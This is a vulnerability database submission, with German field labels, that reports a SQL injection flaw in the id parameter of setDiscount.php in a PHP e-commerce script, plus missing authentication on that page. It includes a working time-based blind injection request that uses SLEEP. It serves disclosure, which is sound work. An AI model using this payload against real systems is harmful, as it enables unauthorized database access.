| Titel | E-Commerce System setDiscount.php SQL Injection Vulnerability |
|---|
| Beschreibung | E-Commerce System has a SQL Injection Vulnerability , the vulnerable URI is '/ecommerce/admin/settings/setDiscount.php?id=201737' , and the injectable parameters is id
A time-based blind poc is below:
GET /ecommerce/admin/settings/setDiscount.php?id=201737 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) HTTP/1.1
And server will also response even if there's no cookie in the header, which is an improper access control. |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| Benutzer | WWesleywww (UID 43117) |
|---|
| Einreichung | 20.03.2023 08:07 (vor 3 Jahren) |
|---|
| Moderieren | 20.03.2023 08:33 (26 minutes later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 223409 [SourceCodester E-Commerce System 1.0 setDiscount.php ID SQL Injection] |
|---|
| Punkte | 20 |
|---|